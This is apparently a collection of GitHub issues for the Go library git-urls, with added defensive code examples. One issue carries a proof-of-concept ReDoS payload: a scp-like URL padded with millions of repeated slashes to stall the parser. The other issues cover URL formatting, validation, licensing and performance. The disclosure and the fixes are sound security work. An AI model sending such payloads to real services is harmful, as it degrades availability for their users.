whilp / git-urls
git-urls parses git URLs
Home Page: http://godoc.org/github.com/whilp/git-urls
License: MIT License
If you parse a git URL without Userinfo and then convert it back to a string, you get an extra "@" symbol.

Consider the following code:

```go
package main

import (
	"fmt"
	"log"

	giturls "github.com/whilp/git-urls"
)

func main() {
	parsed, err := giturls.Parse("https://github.com/whilp/git-urls")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println("Url with extra '@':", parsed.String())
	parsed.User = nil // set userinfo to nil
	fmt.Println("Correct url:", parsed.String())
}
```

Output:

```
Url with extra '@': https://@github.com/whilp/git-urls
Correct url: https://github.com/whilp/git-urls
```

Full runnable code: https://github.com/curusarn/go-git-urls-issue/blob/master/main.go

Are there any drawbacks to setting Userinfo to nil?
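The extra "@" comes from net/url itself: (*url.URL).String writes the userinfo followed by "@" whenever URL.User is non-nil, and url.User("") is non-nil even though it is empty. The following is an added example, not code from the issue or from git-urls; it reproduces the effect with the standard library alone and shows a normalization that drops only an empty Userinfo. Unconditionally setting User to nil would also discard real credentials embedded in the URL, which is the drawback the question above is asking about. The helper name stripEmptyUser and the sample URLs are assumptions for the example.

```go
package main

import (
	"fmt"
	"net/url"
)

// stripEmptyUser clears u.User only when it carries neither a username nor a
// password. A non-nil but empty *url.Userinfo makes (*url.URL).String emit
// "scheme://@host"; a Userinfo that holds credentials is left untouched.
func stripEmptyUser(u *url.URL) {
	if u.User == nil {
		return
	}
	_, hasPassword := u.User.Password()
	if u.User.Username() == "" && !hasPassword {
		u.User = nil
	}
}

// render builds a URL carrying the given Userinfo and returns its String
// form before and after stripEmptyUser.
func render(user *url.Userinfo) (before, after string) {
	u := &url.URL{Scheme: "https", Host: "github.com", Path: "/whilp/git-urls", User: user}
	before = u.String()
	stripEmptyUser(u)
	after = u.String()
	return before, after
}

func main() {
	// Constructed cases: the empty-but-non-nil userinfo that produces the
	// stray "@", a nil userinfo, and a userinfo with a real username.
	cases := []struct {
		name string
		user *url.Userinfo
	}{
		{"empty userinfo", url.User("")},
		{"nil userinfo", nil},
		{"real userinfo", url.User("git")},
	}
	for _, c := range cases {
		before, after := render(c.user)
		fmt.Printf("%-15s before=%s after=%s\n", c.name, before, after)
	}
}
```

The check on Username and Password is what makes this safe to run on every parsed URL: a URL such as https://token@github.com/... keeps its userinfo, while the parser's empty placeholder is removed.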
The regex on line 35 inside urls.go is vulnerable to regex denial of service when a long input is provided inside the directory path of the git URL. I managed to cause a 7s delay, but only because the payload in the URL was too long. Here is the PoC:

```go
package main

import (
	"fmt"
	"strings"
	"time"

	giturls "github.com/whilp/git-urls"
)

func main() {
	var payload = strings.Repeat("////", 19000000) // payload used; the number can be tweaked to cause a 7 second delay
	malicious_url := "6en6ar@-:0////" + payload + "\\" // trailing backslash; the original line ended in an unterminated quote
	begin := time.Now()
	//u, err := giturls.ParseScp("[email protected]:/remote/directory") // normal git url
	_, err := giturls.ParseScp(malicious_url)
	if err != nil {
		fmt.Println("[ - ] Error ->", err) // the original used fmt.Errorf, which builds an error but prints nothing
	}
	//fmt.Println("[ + ] Url --> " + u.Host)
	elapse := time.Since(begin)
	fmt.Printf("Function took %s", elapse)
}
```
Parsing invalid URLs doesn't return errors, e.g.:

```go
u, err := giturls.Parse("https:/lala")
```
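Two checks a caller can place around any git-URL parser, as an added example for the two issues above (it is not code from git-urls and does not reproduce its regex): a byte-length cap applied before the input reaches a regular expression, so an oversized path is refused in constant time rather than scanned, and a validation step that refuses hostless transport URLs, which is what "https:/lala" amounts to. Go's regexp package is RE2 and runs in time linear in the input, so the cap bounds the work a caller can force. The scp-like pattern, the 2048-byte limit, the scheme list and the error values are assumptions chosen for the example.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// maxURLLen caps the input before any regular expression sees it. The value
// is an assumption for this example; real repository URLs are far shorter.
const maxURLLen = 2048

var (
	ErrTooLong   = errors.New("git url exceeds length limit")
	ErrNoHost    = errors.New("git url has no host")
	ErrMalformed = errors.New("git url is malformed")

	// scpSyntax matches [user@]host:path. It is an example pattern, not the
	// one in git-urls. Matching cost is linear in len(input) under RE2, and
	// the length cap above bounds that cost.
	scpSyntax = regexp.MustCompile(`^(?:([^@/:]+)@)?([^@/:]+):(.*)$`)

	// transportSchemes require "://" and a host. Without this list a bare
	// "https:/lala" would be accepted as scp syntax with host "https".
	transportSchemes = map[string]bool{"http": true, "https": true, "ssh": true, "git": true}
)

// ParseGitURL parses scheme://, scp-like and local-path forms, rejecting
// oversized input before matching and hostless transport URLs after parsing.
func ParseGitURL(raw string) (*url.URL, error) {
	if len(raw) > maxURLLen {
		return nil, ErrTooLong // rejected before any regex runs
	}
	if strings.Contains(raw, "://") {
		u, err := url.Parse(raw)
		if err != nil {
			return nil, err
		}
		if u.Scheme != "file" && u.Host == "" {
			return nil, ErrNoHost // e.g. "https:///lala"
		}
		return u, nil
	}
	if m := scpSyntax.FindStringSubmatch(raw); m != nil {
		if transportSchemes[m[2]] {
			return nil, ErrMalformed // e.g. "https:/lala": scheme without "//"
		}
		u := &url.URL{Scheme: "ssh", Host: m[2], Path: m[3]}
		if m[1] != "" {
			u.User = url.User(m[1])
		}
		return u, nil
	}
	if strings.Contains(raw, ":") {
		return nil, ErrMalformed
	}
	return &url.URL{Scheme: "file", Path: raw}, nil
}

func main() {
	// Constructed inputs: a valid https URL, a valid scp URL, the issue's
	// "https:/lala", and an oversized path shaped like the ReDoS PoC.
	inputs := []string{
		"https://github.com/whilp/git-urls",
		"git@github.com:whilp/git-urls.git",
		"https:/lala",
		"6en6ar@-:0" + strings.Repeat("////", 1000),
	}
	for _, raw := range inputs {
		u, err := ParseGitURL(raw)
		if err != nil {
			fmt.Printf("%.40q -> error: %v\n", raw, err)
			continue
		}
		fmt.Printf("%.40q -> scheme=%s host=%s path=%s\n", raw, u.Scheme, u.Host, u.Path)
	}
}
```

The order matters: the length check runs first so that no regex or net/url work is spent on an input the caller would never accept anyway, and the host check runs on the parsed result rather than on the raw string, so it cannot be bypassed by an encoding the parser normalizes.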
Currently, it's not possible to view the docs at https://pkg.go.dev/github.com/whilp/git-urls?tab=overview.
This should be fixable by adding a LICENSE file.
Per @anachronistic:
> so - i did a couple of benchmarks on the lib and found differing speeds + heap allocations depending on the incoming string
>
> and i believe that it's possible to 1) normalize the speed to within reason (i.e. longer strings will naturally take a bit longer to parse), 2) normalize the allocations (i believe you can produce a 0 allocation lib if you write the parser yourself)
>
> i did a shit proof of concept and for local paths i had it down to 150ns / 0 allocations by having a `Parse` method that accepts a pointer to a `net.URL` structure ... ex `func Parse(url string, handle *net.URL) error { ... }`
>
> that was leaning mostly on `strings.Index` which reports first appearance of a pattern, so ex. `colon := strings.Index(url, ":") ... slash := strings.Index(url, "/") ... return colon == -1 || (slash & slash > colon)`
>
> so `file:///whatever` and `/foo/bar/whatever` returned `true` very quickly
>
> it gets a touch more complicated from there, but yeah: that's my challenge to you ... normalized speed (for some reasonable definition of normalized compared to string length) and 0 allocations (or at most 1 if you don't like the C-style of passing in the structure)
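The pattern sketched above, as an added example that is not part of the issue or of git-urls: a Parse that takes a caller-supplied *url.URL and classifies the input with first-occurrence index lookups instead of a regex. The local-path test used here is git's own rule (no colon at all, or a slash before the first colon); the scp-like branch, the error value and the allocation measurement through testing.AllocsPerRun are assumptions added for the example. The scheme:// and local-path forms allocate nothing because every field stored is a substring of the input; the scp form allocates once, for the *url.Userinfo.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
	"testing"
)

var ErrUnrecognised = errors.New("unrecognised git url")

// ParseInto fills the caller-supplied *url.URL from raw. Every field it sets
// is a substring of raw, so the scheme:// and local-path forms allocate
// nothing; the scp form allocates once, for the *url.Userinfo.
func ParseInto(raw string, u *url.URL) error {
	*u = url.URL{} // reset the reused struct; no allocation

	// Form 1: scheme://host/path (also file:///path, whose host is empty).
	if i := strings.Index(raw, "://"); i > 0 {
		u.Scheme = raw[:i]
		rest := raw[i+3:]
		if slash := strings.IndexByte(rest, '/'); slash >= 0 {
			u.Host, u.Path = rest[:slash], rest[slash:]
		} else {
			u.Host = rest
		}
		return nil
	}

	colon := strings.IndexByte(raw, ':')
	slash := strings.IndexByte(raw, '/')

	// Form 2: local path. No colon, or a slash before the first colon, which
	// is the rule git uses to tell "dir/with:colon" apart from "host:path".
	if colon < 0 || (slash >= 0 && slash < colon) {
		u.Scheme = "file"
		u.Path = raw
		return nil
	}

	// Form 3: scp-like [user@]host:path.
	hostPart := raw[:colon]
	if at := strings.IndexByte(hostPart, '@'); at >= 0 {
		u.User = url.User(hostPart[:at]) // the single allocation in this form
		hostPart = hostPart[at+1:]
	}
	if hostPart == "" {
		return ErrUnrecognised
	}
	u.Scheme = "ssh"
	u.Host = hostPart
	u.Path = raw[colon+1:]
	return nil
}

// allocsFor reports the average heap allocations per ParseInto call on raw,
// reusing one struct across calls as a hot-path caller would.
func allocsFor(raw string) float64 {
	var u url.URL
	return testing.AllocsPerRun(100, func() {
		if err := ParseInto(raw, &u); err != nil {
			panic(err)
		}
	})
}

func main() {
	// Constructed inputs covering the three forms.
	for _, raw := range []string{
		"/foo/bar/whatever",
		"file:///whatever",
		"https://github.com/whilp/git-urls",
		"git@github.com:whilp/git-urls.git",
	} {
		var u url.URL
		if err := ParseInto(raw, &u); err != nil {
			fmt.Println(raw, "->", err)
			continue
		}
		fmt.Printf("%-36s scheme=%-5s host=%-12s path=%-22s allocs=%.0f\n",
			raw, u.Scheme, u.Host, u.Path, allocsFor(raw))
	}
}
```

Because the result shares memory with the input, the caller must keep raw alive for as long as it uses the filled struct; that is the trade the C-style out-parameter makes for the missing allocations.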
Thank you for making this library. It looks like it does just what I was looking for. Would you be willing to add a license file?